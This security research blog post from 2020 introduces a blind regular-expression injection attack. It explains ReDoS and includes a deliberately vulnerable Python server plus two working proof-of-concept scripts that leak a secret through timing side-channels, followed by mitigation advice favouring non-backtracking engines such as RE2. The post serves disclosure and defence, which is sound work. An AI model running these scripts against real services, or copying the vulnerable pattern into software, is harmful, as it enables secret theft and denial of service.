A Rough Idea of Blind Regular Expression Injection Attack

Recently, I came up with a brand-new attack vector that uses regular expression (regexp) injection cleverly like blind SQL injection; it should be called a blind regexp injection attack. This article explains the idea and shows a PoC for a sample application.

Introduction: ReDoS 101

There are some types of implementation of regular expression (regexp) engines. One of the examples is NFA (Non-deterministic Finite Automaton) matching engine, which originates from a basic idea that every regular expression has an equivalent NFA. It translates a regexp into an NFA and performs matching by giving a string to the NFA. Specifically, the engine starts to move from an initial state of NFA and reports whether the final state is accepted or not.

However, there might be some candidates of NFA states to move while an NFA engine is processing the string. For instance, consider a string "aaaa" and the following NFA, which is equivalent to ^a*a*$. Note that the transition from 0 to 3 is epsilon transition, a transition that does not consume any input symbol when used. Hence, when the engine starts from the initial state (state 0), the engine can move to both state 1 and 3.

NFA that is equivalent to `^a*a*$`

In this case, major engines take either of two strategies: backtracking-based simulation or simultaneous simulation. In the backtracking-based simulation, the engines move to one of the candidates, and if it does not work, cancel the move and try to deal with another move.

On the other hand, an engine with simultaneous simulation tries all the candidates simultaneously. To the best of my knowledge, this strategy was presented by Ken Thompson[3]. You can learn the algorithm and implementation by a well-written article by Russ Cox[8].

However, backtracking-based NFA engines (referred to as backtracking-based engines) have a big problem: catastrophic backtracking. For example, a python one-liner import re; N = (a natural number); print(re.match('^(.*)*HOGE$', 'a' * N)) takes a lot of time to evaluate; the order of the the number of backtracking caused by the evaluation is O(2^N).

Hence, if an application uses regular expressions inappropriately and inputs for them might be controlled, an attacker can produce a denial-of-service. This attack is called ReDoS (Regular Expression Denial of Service) and classified as an algorithmic complexity attack. Algorithmic complexity attacks are a class of attacks that exploit algorithms by giving worst-case inputs.

The prevalence of ReDoS has been studied by some researchers. Davis et al. did an empirical study on the incidence of super-linear regexps in practice and considered how to prevent and fix ReDoS[11]. Staciu and Pradel identified ReDoS vulnerabilities on some libraries and reported the existence of vulnerable real-world web sites[10].

Of course, statical analysis and methodology of dynamic testing have been studied for mitigation(e.g. [4, 5, 6, 7]). Furthermore, Davis et al. introduced the following three approaches[11].

  1. Adopt abortive backtracking.
    • .NET has a feature to set a timeout for the evaluation of regexps[2].
  2. Use non-backtracking engines.
    • RE2 is a non-backtracking engines.
    • Rust and Go also guarantee linear time matching on all inputs.
  3. Avoiding anti-patterns.

Blind Regular Expression Injection Attack

Research Question

One of the causes of ReDoS vulnerabilities is a vulnerable regexp written by developers themselves. Another reason for ReDoS is unsafe construction of regular expressions; regular expression injection.

Other injection attacks often have a blind way like blind SQL injection and blind XPath injection, but regexp injection does not yet. This fact implies that it is reasonable to consider “blind regular expression injection attacks”, which have NOT been considered well.

Let’s think about how to attack blindly with the following application.

# this src requires timeout-decorator module.
# please `pip install timeout-decorator`

import socketserver
import re
from timeout_decorator import timeout, TimeoutError

@timeout(2)
def search(r, s):
    return re.match(r, s)

SECRET = "this_is_secret"

class Handler(socketserver.BaseRequestHandler):
    def handle(self):
        self.request.sendall(b'Please give a regexp to search: ')
        r = self.request.recv(1024).strip().decode()
        try:
            search(r, SECRET)
        except:
            pass
        self.request.sendall(b'Thanks!')
        
if __name__ == "__main__":
    server = socketserver.TCPServer(("localhost", 9999), Handler)
    server.serve_forever()

This application takes a regexp as user input, searches a secret string (SECRET) with it, and returns only Thanks!. It is important that we cannot know whether SECRET matches a regexp we give or not by only seeing a response from this application. However, the evaluation time of the regexp is limited; it can take only 2 seconds at most. Therefore we might know whether the evaluation time out or not unless the network is stable enough because the evaluation of normal regexps (like ^aa.+$) won’t take long.

We assume that the purpose of attackers is to leak the value of SECRET, and they know SECRET consists of ASCII-printable characters1.

Attacking Applications with Timeout-based Mitigation

Consider the following regular expression.

^(?=(some regexp here))((.*)*)*salt$

Let R be a regular expression shown as (some regexp here) in the above regexp. The syntax (?=R) is called positive lookahead and asserts that the string which follows the current position of a search string matches R. Hence, given that an input string does not match ((.*)*)*salt$2, the matching result with the input string changes the evaluation time of this regular expression:

  • If an input string matches R, the evaluation takes a lot of time. In other words, ReDoS happens.
  • If not, the evaluation finishes quickly.

In the case of our sample application, which has a timeout for evaluation of regexp, this payload takes 2 seconds if SECRET matches R, and a little time if not. Here comes timing attack technique. We can know whether an arbitrary regular expression matches SECRET or not through regular expression injection! For instance, we can leak the length of SECRET by testing how long the evaluation of ^(?=.{1})((.*)*)*salt$, ^(?=.{2})((.*)*)*salt$, … takes. The value of SECRET can be revealed by checking whether nth character of SECRET is c or not, for all n in [1, len(SECRET)] and c in possible characters in SECRET.

Here is the PoC that leaks SECRET.

import socket
import sys
import time
import random
import string
import re

# constants
THRESHOLD = 2

# predicates
def length_is(n):
    return ".{" + str(n) + "}$"

def nth_char_is(n, c):
    return ".{" + str(n-1) + "}" + re.escape(c) + ".*$"

# utilities
def redos_if(regexp, salt):
    return "^(?={})(((.*)*)*)*{}".format(regexp, salt)

def get_request_duration(payload):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect(("localhost", 9999))        
        sock.recv(1024)
        sock.sendall((payload + "\n").encode())
        _start = time.time()
        sock.recv(1024)
        _end = time.time()
        duration = _end - _start
    except:
        duration = -1
        exit(1)
    finally:
        sock.close()
    return duration

def prop_holds(prop, salt):
    return get_request_duration(redos_if(prop, salt)) > THRESHOLD

def generate_salt():
    return ''.join([random.choice(string.ascii_letters) for i in range(10)])

# exploit
if __name__ == '__main__':
    # generating salt
    salt = generate_salt()
    while not prop_holds('.*', salt):
        salt = generate_salt()
    print("[+] salt: {}".format(salt))
    
    # leak length
    upper_bound = 100
    secret_length = 0
    for i in range(0, upper_bound):
        if prop_holds(length_is(i), salt):
            secret_length = i            
    print("[+] length: {}".format(secret_length))
    
    S = string.printable
    secret = ""
    for i in range(0, secret_length):
        for c in S:
            if prop_holds(nth_char_is(i+1, c), salt):
                secret += c
                print("[*] {}".format(secret))
    print("[+] secret: {}".format(secret))

Of course, we can optimize this PoC by binary search!

import socket
import sys
import time
import random
import string
import re

# constants
THRESHOLD = 2

# predicates
def length_in(i, j):
    return ".{" + str(i) + "," + str(j) + "}$"

def nth_char_in(n, S):
    return ".{" + str(n-1) + "}[" + ''.join(list(map(re.escape, S))) + "].*$"

# utilities
def redos_if(regexp, salt):
    return "^(?={})(((.*)*)*)*{}".format(regexp, salt)

def get_request_duration(payload):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect(("localhost", 9999))        
        sock.recv(1024)
        sock.sendall((payload + "\n").encode())
        _start = time.time()
        sock.recv(1024)
        _end = time.time()
        duration = _end - _start
    except:
        duration = -1
        exit(1)
    finally:
        sock.close()
    return duration

def prop_holds(prop, salt):
    return get_request_duration(redos_if(prop, salt)) > THRESHOLD

def generate_salt():
    return ''.join([random.choice(string.ascii_letters) for i in range(10)])

# exploit
if __name__ == '__main__':
    # generating salt
    salt = generate_salt()
    while not prop_holds('.*', salt):
        salt = generate_salt()
    print("[+] salt: {}".format(salt))
    
    # leak length
    lower_bound = 1
    upper_bound = 100
    while lower_bound != upper_bound:
        m = (lower_bound + upper_bound) // 2
        if prop_holds(length_in(lower_bound, m), salt):
            upper_bound = m
        else:
            lower_bound = m + 1
        print("[*] {}, {}".format(lower_bound, upper_bound))
    secret_length = lower_bound # = upper_bound    
    print("[+] length: {}".format(secret_length))

    # leak secret
    S = string.printable
    secret = ""
    for i in range(0, secret_length):
        lower_bound = 0
        upper_bound = len(S)-1
        while lower_bound != upper_bound:
            m = (lower_bound + upper_bound) // 2
            if prop_holds(nth_char_in(i+1, S[lower_bound:(m+1)]), salt):
                upper_bound = m
            else:
                lower_bound = m + 1
        secret += S[lower_bound]
        print("[*] {}".format(secret))        
    print("[+] secret: {}".format(secret))

Mitigation

Abortion of backtracking, which is a way to mitigate ReDoS, is ironically a useful behavior to conduct blind regexp injection attacks. Even if there are regexp injections and no timeout, attackers might control the number of backtracking by choosing payloads appropriately. For instance, ^(.*)*salt or ^(.+)+salt make the number grow exponentially, but ^.+.+salt polynomially. This gives attackers a chance to attack without denial-of-serivce3. Those facts imply that the essence of the problem is backtracking itself. Hence, to mitigate this attack, I’d recommend using non-backtracking engines mentioned above. Let’s use RE2!

Note

I talked about this technique at OWASP Night (an event in Japan). Here are slides: Revisiting ReDoS: A Rough Idea of Data Exfiltration by ReDoS and Side-channel Techniques.

Reference

  1. L. Tal, “ReDoS vulnerabilities in npm spikes by 143% and XSS continues to grow.” [Online]. Available: https://snyk.io/blog/redos-vulnerabilities-in-npm-spikes-by-143-and-xss-continues-to-grow/. [Accessed: 09-Feb-2020].
  2. “Regex.MatchTimeout Property (System.Text.RegularExpressions).” [Online]. Available: https://docs.microsoft.com/en-us/dotnet/api/system.text.regularexpressions.regex.matchtimeout. [Accessed: 09-Feb-2020].
  3. K. Thompson, “Programming Techniques: Regular Expression Search Algorithm,” Communications of the ACM, vol. 11, no. 6, pp. 419–422, Jun. 1968.
  4. J. Kirrage, A. Rathnayake, and H. Thielecke, “Static Analysis for Regular Expression Denial-of-Service Attacks,” in Proceedings of the 7th International Conference on Network and System Security, 2013.
  5. M. Berglund, F. Drewes, and B. van der Merwe, “Analyzing Catastrophic Backtracking Behavior in Practical Regular Expression Matching,” in Proceedings of the 14th International Conference Automata and Formal Languages, 2014.
  6. V. Wüstholz, O. Olivo, M. J. Heule, and I. Dillig, “Static Detection of DoS Vulnerabilities in Programs That Use Regular Expressions,” in Proceedings, Part II, of the 23rd International Conference on Tools and Algorithms for the Construction and Analysis of Systems - Volume 10206, 2017, pp. 3–20.
  7. Y. Shen, Y. Jiang, C. Xu, P. Yu, X. Ma, and J. Lu, “ReScue: Crafting Regular Expression DoS Attacks,” in Proceedings of the 33rd ACM/IEEE International Conference on Automated Software Engineering, 2018, pp. 225–235.
  8. R. Cox, “Regular Expression Matching Can Be Simple And Fast (but is slow in Java, Perl, PHP, Python, Ruby, …).” [Online]. Available: https://swtch.com/~rsc/regexp/regexp1.html. [Accessed: 09-Feb-2020].
  9. S. A. Crosby and D. S. Wallach, “Denial of Service via Algorithmic Complexity Attacks,” in Proceedings of the 12th Conference on USENIX Security Symposium - Volume 12, 2003, p. 3.
  10. C.-A. Staicu and M. Pradel, “Freezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers,” in 27th USENIX Security Symposium (USENIX Security 18), 2018, pp. 361–376.
  11. J. C. Davis, V. Tech, C. A. Coghlan, V. Tech, D. Lee, and V. Tech, “The Impact of Regular Expression Denial of Service ( ReDoS ) in Practice : An Empirical Study at the Ecosystem Scale,” in Proceedings of the 26th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering, 2018, pp. 246–256.
  1. We can loosen this assumption as follows: “they know a character set which SECRET consists of.” 

  2. I mean that "salt" is a random string. If an input string does match ((.*)*)*salt$, we can regenerate another random string. 

  3. To the best of my knowledge, it seems to be difficult to craft a ReDoS payload that has an attacker-controllable upper bound of the number of backtracking. However, if it is possible, blind regexp injection attacks will turn into a more powerful method. 

Written on February 9, 2020